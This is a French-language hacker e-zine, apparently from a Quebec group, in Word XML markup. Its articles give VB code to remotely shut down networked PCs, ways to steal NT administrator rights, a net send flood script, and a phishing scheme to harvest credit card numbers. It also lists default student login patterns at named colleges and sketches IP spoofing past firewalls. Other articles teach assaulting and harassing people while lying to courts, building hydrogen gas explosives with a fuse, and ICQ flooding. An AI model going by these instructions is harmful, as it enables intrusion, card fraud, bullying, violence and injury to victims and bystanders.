        <w:t>Redémarrer le poste réseau d'un autr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Bon..Cet article est dans parentphreak car il se peut que vous aillez un réseau NT à la maison..Sinon, utilisez cette méthode à l'école..Premièrement, il vous faut les droits administrateurs.(Pour les avoir, allez à l'article suivant) Quand vous avez ca, allez sous VB et:</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créez un module et entrez comme cod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rivate Declare Function InitiateSystemShutdown Lib "advapi32.dll" Alias "InitiateSystemShutdownA" (ByVal lpMachineName As String, ByVal lpMessage As String, ByVal dwTimeout As Integer, ByVal bForceAppsClosed As Long, ByVal bRebootAfterShutdown As Long) As Long</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rivate Declare Function AbortSystemShutdown Lib "advapi32.dll" Alias "AbortSystemShutdownA" (ByVal lpMachineName As String) As Long</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ublic Function ShutDownComputer(CompName As String, MessageToUser As String, SecondsUntilShutdown As Long, ForceAppsClosed As Integer, RebootAfter As Integer)</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ShutDownComputer = InitiateSystemShutdown(CompName, MessageToUser, SecondsUntilShutdown, ForceAppsClosed, RebootAfter)</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End Function</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ublic Function AbortShutdown(CompName As String)</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AbortShutdown = AbortSystemShutdown(ComNam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End Function</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Bon, la tout y est pour redémarrer, il suffit de créer un bouton qui commandera le redémarrag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Dim a</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a = ShutDownComputer(nom_poste, message, 1,2, 3)</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nom_poste:nom du poste à redémarrer</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message:ce qui va apparaître à l'écran</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1:délai en secondes</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2:si les applications se ferment en redémarrant(1=oui, 0=non)</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3:redémarrage (1:redémarrage,0=shutdown)</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Bon ben voilà et faites phreaker vos parents et votre prof d'informatiqu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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Obtenir les droits administrateurs sous un réseau NT4.0(exemple sous SP5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>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Vous allez voir c'est pas mal stupide...Premièrement ça vous prends le pass du bios..Il y a pleins de utilz pour ca sinon utilisez debug.  Ensuite de ça, vous bootez sur une diskette systeme, puis vous allez dans c:\winnt\profiles</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vous voyez, l'account que vous utilisez à tout les jours est là, ceux des autres qui utilisent votre poste aussi, et celui de l'administrateurs...Donc allez dans celui du root et copiez ntuser.man vers votre rep...On reboot, et c'est fait!</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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Changer son nom de poste sous un réseau Win9xNT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>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Héhé...Encore du Vb...Le but de changer son nom de poste se dévoilera dans le prochain article...Bon..Allez sous VB:</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Dans un modul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Public Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long</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Tout sur la même lign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Ensuite dans form_load</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newcomputername$ = InputBox("What Do you want your computer to be called?", "Set computer nam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f = MsgBox("Are you sure you want to Do this?", vbYesNo, "Are you sur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If f &lt;&gt; 1 Then</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Call SetComputerName(newcomputernam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Els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Beep</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q = MsgBox("Aborted!", vbCritical, "Aborted!")</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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>End If</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Héhé..Déjà fini..c'est pas mal simple VB non?</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En tout cas, lisez le prochain articl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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Faire buster un root pas compétent..mouhahaha</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>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Bon..Pour le réseau à mon école en tout cas le technicien l'a pas trouvé drôle...Bon..première étape, c'est la plus difficile...On va dans poste de travail, puis on se choisit un répertoire où on a le contrôle total(dans mon cas c:\winnt fonctionnait), et on va dans propriétés. Ensuite dans sécurité, puis dans permissions, et ensuite on va dans ajouter, là , dans la fenêtre qui apparaît on clique sur montrer les utilisateurs, et dans la liste, tout en bas, se trouve le nom d'utilisateur du root..mouhahaha...Bon..Comme on est PAS rebels, on va juste lui faire peur..Bon on change notre nom d'ordinateur(si les permissions ne vous l'accordent pas, voir article ci-dessus), et on va dans vb.</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Dans Vb, on créer un nouveau projet et on mets seulement un timer sur notre form, puis 10 dans interval, puis comme code timer1_timer, mettez ceci:</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shell "net send nom_du_root ton_message_arnachist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exemple:</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shell "net send administrateurs mouhahha ton réseau est en feu"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>ouais, yenque ça...La on laisse le programme ouvert tout le cours...hmm..ouais tout le cours...Donc..ti calcul rapide, si on envoie 100 msg /sec et qu'un cours dure 75min, on enlève 5 min pour faire le programme ,ca fait 70*60*100=420000msg..OUI! le root va vraiment recevoir 420000 msg et croyez moi ce fameux message a vraiment l'apparence de jamais se fermer..Pis si jamais le root est le plus con des plus con il pensera pas à laisser son doigt sur enter et va user 4 souris à cliquer 420000 fois..Bon..Ctait pas mal pourri comme article mais c'est drôle pareil quand le technicien t'appel et te demande t'enlever ça...des net send...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>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Quesque l'anarchi, d'apres Lord Sot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Ben, si vous êtes comme moi, vous aimez pas</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la société dans lequel con vie, pour un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ou des raisons différentes. Moi mais raison,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sa me tente po te travailler toute ma vie pour</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faire vivre les gros indiens criss qui ce pogn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le cul à avoir leur BS de 500$ part semaine, j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déteste la loi aussi esti, elle est mal faite pis</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tout les crisse de politicien c une gagne de vendu</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pis une gagne de calise de rapace qui pense just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à prendre ce que vous avez ci durement gagné à la</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sueur de votre front. Moi ce que je veux, c d'êtr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mmander part moi-même pis po par du monde qui</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pense plus hot que les autres, comme les estis</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de bosse de compagnie qui se pense les meilleurs</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et qu'il on plaine de cash, mais si j'irais dans</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le bureau avec une hache, y rirai un tit moins</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L'anarchie c de défendre une cause que la société</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est contre et d'agire pour que sa change. Pis l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calisse d'argent de tabarnaque, ces de la mard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je trouve sa innocent d'échanger des chose pis d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courir tout notre vie après des boutes de papier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innocent avec la têtes d'une folle (reine) qui à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son beau droit de vétau et qu'elle ce pense êtres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capable de diriger avec sa. Le monde est fou!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Arrêter de vous faire diriger et d'être aveugl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rdsoth</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lt;Dukest4r&gt; Asti que je l'appuie a 10 000%</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mment intimider quelqu'un, par LordSot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étode DU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etton que vous haiiser quelqu'u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un fife, un con, un innocent et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t que vous le fréquanter au burea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école, etc, Ben premièrement regarder-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ns ces ti-yeux con, d'un aire faché p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lui dite (quesque tu veux la est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tapette.) Il vas farmé sa gueule c'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surer et puis quand vous allez le retrouv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ns un coridore sans trop de témo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laqué le ( si il y a beaucoup de témo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l faut que sa recemble un un acrochag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t si vous êtes seul dans le corido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entré le dans le mur de toute vos forc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 puis s'il vous résiste, calissé lui un cou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point dans le ventre et dit lui "  Si t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risse po ton quant dicite, sa vas être p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e vous le jure, aprêt quelque jour plus tar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aller voure qu'il n'est plus la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Vous lui avez fait mal physiquement, ma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st plus le matal que vous avez attaqué i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as être tourmenter et il vas lach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n group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est l'un des moyens les plus éficac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repérez la victime et vous aller l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ire en croupe, vous l'entourez et vo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aroché ses (livre, feuille etc) a ter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 qu'il a dans c'est main ou dans sa ca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ureau . Vous lui chantez des baîtise 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le bousculer et vous lui dite enco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Si tu crisse po ton quant dicite, s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as être pire )Et vous continuer comment s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n y allent plus fort de jour en jour et i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as partir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iscrète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êtes un peu gêner héhéhé , c po gra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avez des recourt pour le faire parti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 sa paraitra même po.Pour comencer vous l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écrivez des petits massages (menac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ui brissez des objets ou vous les voler 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sent bien une preuve du vole, vous lui briz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on chard (grafigne, patate dans le mofl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ucre dans gaz, etc) En lui lessant bien d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essage que c'est une personne de son entoura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i fait sa et vous lui dite que vous voule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i crisse sont quant! Arcelé-le comme ça et i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as lach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 il ya des poblèmes , police etc vous nie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ousse ce qui dit et si il vous amène en cou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comme vous ne croyer pas à la justice, mant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it s'il y des témoin, dit qu'ils ce sont arang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our lui faire de la marde, trouvez vous d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témoins ( faux ) et surtout resté calme et s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ous êtes catolique et qu'il vous demande d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uré sur la bible , dite vous c'est une be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faire de la société et ce n'est po Dieu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i a inventer cette loi. Resté fort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mment penetrer un systeme proteger par un firewall, par  TX[|}X]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 metode est particulierement agressive.pour la comprendre vous devez avoire une ba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u fonctionnement des reseaux(pas besion de vous defoncer en lecture sur le sujet).un paqu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p contient a par le veritable message, toute une serie d information necesseraire au transfe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e donner de l expediteur vers le receveur.habituellement on peut modifier cest donner et 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xtraire les fonction de protection du firewal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our cela,vous dever falsifier laddresse expeditrice du pacquet ip avec un logiciel de spoof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ur ceux qui en on pas ,je vais en mettre une disponible sur le site tres bientot.si je ve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ttaquer a un ordinateur dans un resaux proteger par un firewall,je donne a ses paquets de donner ladresse dun poste qui se trouve dans le meme resaux que lordinateur cibler.lorsque les paquets arrivent au firewall,celui-ci verifie l adresse de lexpedition.il va remarquer quil sagit de ladresse d un ordinateur imterne au reseaux.il va donc considerer que se paquet est sana danger et il va le transmet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a thecnique des paquet ip modifier te pemertteras pas dacceder au systeme tout suite,ma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st la premier etape pour y acceder,cardans ses paquets tu peut envoyer des genvirus,des fichier .bat, des troyen et des virus. habituellement un seul paquet permet d excuter le fichier envoyer.DONC BON PIRATAG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X[|}X]</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Un article mixer sur plein de sujet, par ]SoulFly[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riten By ]SoulFl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__________________________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 xml:space="preserve">                    Quebec Hacker's Allianc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 Un mot de la Grc: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 Par crime informatique, on tout acte illéga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 au  cours  duquel  le  système informatique devien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 l' objet  d' un  crime   ou en  est l'instrument e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 contient des éléments de preuves.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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moi Jleur dit FranchementALLER DONT TOUTE CHIER KR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_________________________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Hola hé, bon ben enfin, j'me suis décider pis voila que j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suis encore en train d'écrire un  autre artic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n ok, je l'Admet on peut pas dire que c'est une habitu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cq  ca  fait  juste  2  fois  mais  c'est  une  drole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incidence  vous trouvez pas? De quoi il  va  parler  c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rticle  la ? Bon ben j'vais vous donner encore une  au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acon pour trouver des CC sur le web pis aussi ben  j'v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ous   parler   de  mon   nouveau  programme...   Bon  b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njoyés  pis aussi ,  si vous êtes  un  gars de la grc  o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edon un délat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1- Je vous emmer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2- Ben lisez pas ca je vous l'interd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n  et bien cette technique est  vraiement  trop  faci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remièrement  il vous faut trouevr une compagnie qui  ven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s  articles   sur le web...  Peut    importe  ce  qu'il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endent...   l'important c'est qu'ils vendent beaucoup. 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ussi,  il faut que   vous  puissiez  avoir  access  a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ichier   (  normallement  contenu  sur  le  site  )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ntient les adresses email des acheteu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n pour trouver ce genre de site vous pouvez utiliser web</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erret quoi que ce n'est pas vraiement nécessair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avez  qu'a vous spotter un site et aller voir  dans  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irectory /admin /cgi-bin et autres répertoires du gen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uxièmement,  vous aller voir  le  site  en  question  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urtout, la page html   qui permet au   WEB CAVE ( clien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irtuels ) d'acheter le produ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Je  sais pas si vous catcher mais j'vais continuer au  c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ou n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n bien a partir de la vous enregistrer la page avec  c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mages  et tout et tout.  Et puis vous  modifier  le  mo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nvoie  des donnés pour qu'elle vous envoie les infos  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ous-me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nsuite  , grace à la liste des emails des  WEB  CAVES  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ien,  vous envoyer un joli petit email a tous  ces  cav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isant qu'il y a  eu une  erreur de  transfert de  fichi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t   que vous avez perdu les info de  la command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jouter    que pour  que  la    commande  soit    pris  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mpte  ils doivent   remplir une nouvelle   demande    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llant a telle adresse : la c'est  la page  que  vous av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uploader   sur  n'importe quel site cheap.   Pourvu que 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e soit pas xoom ou geocities ou quelque   chose du gen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urquoi?  Ben tabarnak le monde est cave mais  pas  a  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int  la.   Bon et bien le  cave va donc   aller  rempl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a  feuille  de commande   et cela va  vous    emailer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mmande avec ses info de carte de crédit :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ais  cependant si le gars est moindrement intelligent  i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a  préférer  retourner  sur  le  site  officiel  ou  b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ntacter  le webmaster du site officiel  par  email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avoir    c quoi le problème  pour  ensuite  découvrir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ros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oi  faire pour ne pas  que  ca  arrive  (  Éveiller  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oupons des cav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 Utiliser un anonyme mail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 Faite hoster votre feuille de commande par un site ay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un URL qui ressemble a celle de la compagn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3- Ajouter une page qui félicite la personne  après qu'e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it remplit la feuille sur votre s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4- Pourquoi ne pas recopier le site au complet  en chang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s    emails et les liens.   ( C'est plus long mais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onctionne tellement mie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ans  l'autre cas...  celui ou le web cave ne  verra  r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ller et bien il recevra sa commande donc ne se doutera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ien et vous vous profiterez d'un autre CC que vous  fer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 que bon vous semble ave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n  c'est tout.  Mais  avant  de  terminer  cet  artic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j'aimerais  vous parler de mon programme...  Credit  Frau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st  quoi ca?  et bien  c'est un générateur de  car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  crédit  qui n'est pas un générateur   mais en fait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rogramme    qui vous   permet d'obtenir des CC (des  vra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i  fonctionnent) sans vous forcer.   En  fait, il s'ag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 CC que j'ai trouver,  que j'ai regrouper par catégor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ais   crisse que  je  suis  smath  pareil.   Ca  l'a  p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allure.   En plus, étant donné  qu'apres  2 mois  les C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ntenus  dans  le prog   marcheront plus  et  bien   j'a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enser  faire des fichiers d'update  à  tout  les  2  m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isponibles  sur notre merveilleux site web.  Pis tout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gratuite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Finalement,  ce  programme  ne  sera   pas   libre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istribuer,  pour des  raisons   évidentes  que  je  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irai pas,  c'est à vous de trouver   pourquoi.   Don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   programme ne sera disponible que pour les  memb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de  Qha &amp; Hellbc. Si  vous  voulez en  savoir  davantag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ant qu'à  la raison de ce  changement,  contactez la GRC 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mandez-leur  si ce type de   programme  est  léga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EN OUI VOYONS DON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raiement désoler de cet inconvéni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auheua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i  vous avez rien compris de ce que j'ai  écrit,  laiss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and la personne qui s'est fait Hacker ca carte de créd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ecoit le faramineux compte de sa carte de crédit ( je d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aramineux pcq c'ets vraiement des crosseurs les compagni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  carte de crédit...  ils font pas ça pour rien! Ce so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n  quelques sorte des prêteurs sur gages  mais  en  mi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êtus.   Donc, lorsque la personne recoit son compte, e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e rendra compte  qu'elle  n'a jamais acheté un Ordinat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ou  encore qu'elle  n'a jamais réserver de nom de  domai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bein sûr,  si elle prends  la  peine  de  regarder  s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mpte,  y'en a  qui ont tellement de cash qui    le  pay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is  qui chialent pas ).   Et bien  lorsqu'elle  se rendr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mpte qu'il y a  donc  une arnaque, elle  se  réveiller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rendra   le  téléphone   et téléphonera   directement   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a compagnie de se carte   de crédit.  La personne enverr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hier  tout le    monde   et  après  quelques  séances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hialage  et d'envoyage  chier et   bien elle  ne  paiyer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as    pour  les choses  qu'elle n'a   pas  acheté.  Aprè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a,  si vous aviez acheter un domain  nam  avec,  et  b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ttendez-vous qu'il ne  fonctionnera plus dans  des dél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and  même assez long.  Aussi, si vous aviez   hacker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arte  pour un montant assez élevé,  il y aura une enquê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i  ne devrait aboutir à rien si  ce  n'est   qu'à  a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ait chier la compagnie qui crosse tout le monde mais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ient  tout   juste de se   faire   avoir  par   vous-mê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Mais malheureusement,  cela   peut se retourné en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aveur  de la crisse de compagnie car  elle  paiera  moi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impôts  dût à moins de revenus,    ce qui signifie moi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argent  pour  le gouvernement,   moins de service à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pulation    et  etc.   C'est  donc   un  immense  cerc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icieux ou tout le  monde y gagne et y perd en même temp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a  commence à être songé!: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_________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Cracker les mots de passe des CEGE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n  ce truc est vraiement facile mais je l'ai mis  parei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u cas ou vous n'y auriez pas pen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ici la technique pour le cegep de Ste-Fo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1- Demander la carte d'étudiant à un des étudiants de ce CEGE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2- Son login est son n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3- Son password est son # de D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oici la technique pour le cegep FX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1- Demander la carte ou l'horraire d'un étudiant de ce CEGE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2- Le login est son prénom et son n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3- Le password est le # de D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pandant,  les  étudiants  de  ce  cegep   peuv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odifier leur mot de passe... mais, la moitié ne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ont pas.  Donc si ca marche  pas avec un réessay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vec  un autre .  Je  sais de source certaine que 1</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étudiant sur 3 de technique  info de ce cegep n'o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ême  pas  changer  leur  mot  de  passe...   Alo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maginer  ceux  qui  ne  s'y  connaissent   pas  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nformat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e  reviens justement du CEGEP et puis a ma  gra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tisfaction,  même si l'étudiant change son mot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sse,  vous pouvez  vous loguer  avec le #  de D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lors encore plus faci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ici la technique au CEGEP de limoilo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tab/>
        <w:t>Je sais pas encore comment mais jvais le savoir bientô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eut-être dans le prochain Ezine</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>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aintenant que vous avez votre accès! Qu'allez vous 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n  c'est simple,  si vous  vous  êtes  forcé  pour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rouver  un accès ce n'est  certainement  pas  pour  r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ous allez vous en servir afin de  tester tout ce qu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oulez,   car si  vous  utiliser votre accès,   vous ser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ite  retracer et les  sanctions peuvent s'avérer  sévè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épendant  de l'établissement.  Vous pourrez donc avec c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ccès trouver une façon d'accèder aux fichiers des prof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guer  le  réseau,   d'éviter  lan  school  et  un    t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autres choses. La seule  limite est votre imagination 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ien sur votre intellige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ard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  but de l'Organisation était de se  procurer  plusieu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uméros de  carte de crédit,  pour  ensuite  passer plei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   commandes bidon et retirer toute  l'argent.  Pour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lle   devais engager plusieurs « hacker » qui,  jour   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uit, auraient  chercher  de nouvelles CC pour permettre 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Organisation  de  carrément  sucer  les  plus   d'arg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ssible sur la carte. Mais engager plusieurs centaines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ersonne qui leur  permettrait  d'avoir plusieurs  milli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 CC était la tache  la plus difficile.  L'Organisation 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onc    créé   plusieurs  sites  de  cul   bidon  (X-Pi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i  offriraient  un   système   de    rémunération    pa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lick/abonnement.   Donc, Acxel (nom fictif)  vole des C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nsuite  il fait plusieurs faux  abonnement à  X-Pics,  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ics  prends  ces CC, retirent  le plus  d'argent possib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t  envoie un petit cheque à Acxel pour  le  remercier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es services.  L'Organisation  à  indirectement engagé d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hackers », et ces « hackers » ne le savaient meme p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  système   de   Pay-Per-Click   était   seulement   u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uverture,  l'Organisation  pensait  surement   que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ystème Pay-Per-Signup serait plus populaire. Elle à s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stimé   ses employer.   C'est pourquoi   plus  tard    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ystème   de  Pay-Per-Click   à  été  complètement   ferm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t  maintenant  l'Organisation forçais ses employer à l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onner des C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ur   augmenter   le   rendement   de    ses    employ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Organisation  à bloqué   le  multi-abonnement   avec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eme  CC, donc  l'employer devait donner   plus  de  CC  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Organisation et elle faisais plus d'arg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 type de fraude demande une organisation très  structur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e seul  le crime organisé peut  mettre en place.  La GR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a avoué il  y  a  quelques semaines : le  crime organis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   de meilleur équipement    et   est   technologique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lus   avancé  que   les  organisations   policières.   J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rois  que nous allons "voir" de plus  en plus  de   cri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ubtil  comme  celle d'X-Pics,  le  crime subtil  explo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s gens sans que personne s'en rendent compte,  c'est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rime  du nouveau  millénaire.  Si   moi  j'y  ai   pen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d'autre l'on mit en pratiqu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himiste 101</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On  va commencer le cour par un  peu  de  théorie  sur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hys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importe  qui de brillant sais que  H²O  est  la  formu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hysique de l'eau.   Non? Tk la vs le savez :)  En gros s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eut dire  que  2  atome d'hydrogene + 1 atome d'oxyge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  l'eau Simple? Mais c'est la que sa  commence   a  ê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nterressant...    N'importe qui de wyze   sais   que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hydrogene en quantiter sa pete quel cr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mbe a l'hydrogene pers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ettez  vous de l'eau a bouillir sur le rond.   Mettez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ond  a  200.  En  fesant  bouillir  l'eau  les  particu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hydrogene vont se transformer  en gaz  et vont sen all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n l'air.  Donc, mettez un bol en plastique au dessu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otre bole.   L'hydrogene est plus  léger  que   l'oxyge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t  l'axote  contenu dans l'air donc il va monter.   La v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ller vs ramasser un beau mélange 1</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oxygen:20%  hydrogene:50% azote:30%</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ur enlever l'oxygenre c simple.  Mettez un tison dans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ac/bol en plastique.  Tjs rester l'ouverture vers le b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inon lé gaz vont parti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___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tab/>
        <w:tab/>
        <w:t xml:space="preserve">      |  &lt;-- Bo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tab/>
        <w:t xml:space="preserve"> Gaz</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tab/>
        <w:tab/>
        <w:t xml:space="preserve">      | ©]SoulFL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pres  avoir enlever  l'oxygene  on  se  ramasse  avec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amassi  d'hydrogene et  d'axote.   Et faut  continuer   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uillir  de  l'eau  et  a  enlever l'oxygene  pendant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it boute.   Apres si on a ben réussi son coup le gaz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a  etre dans le sac va etre  frete   quel   criss.    -73</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gree  celcius.  Mettez vous pas les doigts  dedant  tr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ongtemps   sinon   vous  aller   les  perdre.   Quand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empérature  du gaz baisse,  jvous conseille de tnir to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ource de feu ou d'étincelle loin.  En passant, si vous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espirer   vos poumons vont geler,   c'est pas  conseill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0).   Tester le sur  le chat de votre soeur  voir  si  s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arche  ben :)  Mettez  sa  dans   un  contenant  le  pl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mprimer  possible. Jvais pas  vs  expliquer  comment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mprimer  c'est trop dangereux :)  Mais si vous vnez  qu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voir  un liquid ak une brume blanchatre dessu,   dite  v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e c'est le gaz qui est devenu liquid pi que la brume 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auser  par la condensation.   En tk. Si c'est pas  liqui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st  pas trop grave.   Refermer votre bole et percer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it trou dedan E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gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&g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Bombe a l'hydrogene perso I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a méthode marche surement bien mais y'en existe  d'aut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oici la mienne,   vous prenez 2 morceaux de carbone (mi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   crayon)  pis  vous  entourer   des  fils  électr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ettons  d'un  transformateur  et  vous mettez  un volta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nviron  5 volts,   faut pas en mettre trop sinon ca  v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urcircuiter.   Je vous conseil d'utiliser des bouteil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 liqueur (petit  gouleau)  c'est plus facile a mettre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uchon  dessus.  À noter que  l'oxygène   et  l'hydrogè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on  TRÈS volatile. La  tâche  la  plus difficile c'est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emplir  votre contenant et le  virer à l'envers sans  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out  chi partout.  La en mettant le jus vous  allez  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s  petites bulles qui vont se former sur les  électrod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uis peu à peu ca va remplacer toute le vinaigre ou l'ea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w:t>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hydrogene + oxyge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w:t>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 jus                 |             eau ou vinaig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5volts              |                        O            O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     |__________________|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__________________________|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_____________________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a  vous placer vos deux électrodes dans de  l'eau  ou  d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inaigre (de l'eau  ca pu moins pis ca coute  moins   ch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i   vous  restez  pas  en afrique).   Vos  électrodes  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oivent  PAS se toucher,   distancer les  de quelques  c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vec cette méthode vous allez vous ramasser un mélange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2:1   (2  hydro:1  oxy)   en   mélangant   les   deux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oxygène   aide  la combustion de l'hydrogène et ca  pè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lus fo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i  vous  voulez  juste  ramasser  l'hydrogene   dans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ntenant et l'oxygène dans un autre voici le shém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 xml:space="preserve">      ____</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        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ab/>
        <w:t xml:space="preserv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le jus         | les      |      | l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volts      |gazs    |      |gaz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           |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           |    O    |      |     O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  |_____|</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserv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_____________________|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      vinaigre  ou  eau</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   |_____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ans  une des épouvettes y va  avoir  l'oxygène  pis  da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autre y va avoir l'hydrogène!  Pour déterminer dans qu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éprouvette  est  l'hydrogène  et   quel   éprouvette   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oxygène  et bien c'est assez simple,  y va avoir 2  f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lus  de  gaz  dans  une  des  éprouvettes,  ca  va   ê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éprouvette ou y'a l'hydrogè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Je  vous  mets  en  garde  car  l'hydrogène  est  un   ga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XTRÈMEMENT puissant, commencer  par en faire  en  petit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antités  et  ensuite  augmenter progressivement.    Il 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 quelques années c'était très  à  la  mode  de faire  s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hydrogène,   sauf y'avais  des  morons  qui  savaient  p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mment,  ou  dosais mal leurs affaire pis ca leur  pét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ans face,   le pire que j'ai  entendu c'est la perte d'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oigt  et  un  éclat  de  verre  dans l'oeil.  Moi je p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emettre mon bras, vous pas. JOUEZ PRUDEM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___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 xml:space="preserve"> Gaz</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">         | &lt;-- Bo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ab/>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ab/>
        <w:t xml:space="preserve">    _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ab/>
        <w:t xml:space="preserve">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_______________| |________| ©]SoulFl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 xml:space="preserv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tab/>
        <w:t xml:space="preserv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uchon</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    |_| &lt; Mèc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renez  soin de mettre une mèche  plus  longue  que  s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areille  Et calisser vote camp au  plus  criss  sinon  v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ller vs en rapel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aite gaffe...  Sa fait mal 2000 livres de press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oulFl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_________________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Flood des temps moderne pour ICQ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i  vous êtes un de ces fanatique de ICQ,vous  devez  sa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ucun  doute connaitre le  merveilleux  service  qu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offre mirabilis Je veux bien sur parler du web pag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on  pour ceux qui connaissent pas  cet  utilitair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vez vous demander secretement la   question qui suit  o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ien  vous avez déjà passer à un autre  article  pcq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êtes trop lâchent pour vous forcer les méning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t;&lt; C'est quoi s'te cochonnerie la? &gt;&g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 web pager est un service permettant à n'importe  que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ersonne  de vous envoyer n'importe lequel message,  aus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mbécile  et inutile qu'il soit ou qu'il ne soit pas.  O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 message que vous désiriez tant recevoir même si vous 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nnaissiez  même pas  l'existance  vous  est  directe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ransféré par le biais du merveilleux programme ICQ.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ux  qui voient pas ou j'veux en venir,  ben  vous  dev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ous  demander la question   qui suit ou  bien  vous  av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éjà passer à un autre article pcq vous êtes trop  lâch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ur  vous forcer les méninges...  (messamble j'ai déja v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ça quelque pa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lt;&lt; Pis c'est quoi ça fait? &gt;&g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esque ça fait .... Vous êtes malade vous parler comme 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était  rien!!!!  Bande  de  détraqués...  Bon,  j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accorde,  c'est  pas si hot que ça,  mais imaginez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onc  que il y a ici une  manière de flooder sans  risqu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e  vous faire ignorer (Quoi que on  s'en  calisse  de  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faire  ignorer!!!).  Bon   la   vous   commencer    à   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écourager;  vous devez  encore une fois  vous posez   u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utre  question idiotes qui pourrait s'avérer  être  ce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i   suit à moins  que vous ayez déjà passer  à un  au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rticle  pcq   vous êtes trop   lâchent  pour vous  forc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s méninges... (Impression de déjà vu :o)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lt;&lt; Comment on fait? Comment on fait? &gt;&g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ok, je vais vous le d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irst :  http://wwp.icq.com/UIN#pag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Bien sur, UIN c'est le # d'icq du ga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Vous allez la pis vous attendez de l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le second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cond :  Soit que tu clique un million de fois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envoyer  ton message,   soit tu te code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programme pour le faire ou encore soit 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tu te trouve un programme pour le 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hird :  Ben y'en a pas de   thirdio... Soit que t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recommence ou soit que tu fait autre cho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ou encore soit que tu te tire  une   ba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dans la tête ce qui revient à faire  au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chose mais la on est pas la pour vous d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de vous suicider alo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Ok, j'ai testé plusieurs choses... les # de ICQ commenc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à  1001... Aussi,   si vous tombez  par hasard   sur   u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age http://wwp.icq.com/UIN#pager pis que ca vous don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n Error Has Occure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uld not find the requested ICQ World Wide Pag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lease recheck the WWPager address &amp; try aga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en  soit que vous avez pas le bon #  ou  ben  faites  d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eload à tour de bras, ca va finir par march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ussi, voici un example de ce que le gars reco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ender IP: 207.228.64.64</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ubject: r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ncore moins que r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onc... Spoofer vous don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_________________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ESN NUMBE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j'ai relevé une série de ESN Numb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ux qui ne savent pas à quoi cela sert, laissez faire 